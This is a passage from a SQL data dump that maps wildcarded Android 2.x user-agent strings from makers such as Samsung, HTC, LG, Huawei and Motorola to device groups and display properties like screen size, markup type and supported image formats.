AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-P1000M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5302) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5302B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5360) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5360B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5360L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5570) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5570-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5570I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5570L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5660) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5690L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5830) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5830-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5830L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5830M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5830i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5839i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S5839i-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6102) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6102B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6500-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6500D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6802) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S6802B) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S7500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-S7500L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Desire S) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Desire) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC EVO 3D X515m) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Legend) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Sensation 4G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Vision) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Wildfire S A510e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC Wildfire) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_ChaCha_A810e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_DesireHD) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_DesireHD_A9191) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_DesireS_S510e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_DesireZ_A7272) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_Explorer_A310e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_IncredibleS_S710e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_Rhyme_S510b) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_WildfireS_A510e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HTC_Wildfire_A3333) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HUAWEI Y210-0100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HUAWEI Y210-0151) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HUAWEI Y210-0200) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; HUAWEI Y210-0251) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Huawei-U8665) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Ideos) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Ilium_AVVIO_760) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-E400) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-E400-Orange/V10p) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-E400/V10j) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-E405) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P350/V10g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P500h) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P690) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P698f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P920) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P970) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; LG-P990h) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Lenovo A208t) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Lenovo A316) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Light Tab 2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; MB525) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; MB855) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; MOT-XT615) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; MT11i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Milestone) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; N720) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Nexus One) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Nexus S) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ONE TOUCH 4007A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ONE TOUCH 4007D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ONE TOUCH 4007X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Orinoquia Auyantepui Y210) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; PantechP9060) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Racer) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SAMSUNG GT-I8160) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SAMSUNG GT-S5830) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SAMSUNG GT-S5839i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SAMSUNG GT-S6500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SHV-E110S) AppleWebKit/* (KHTML, like Gecko) Mobile 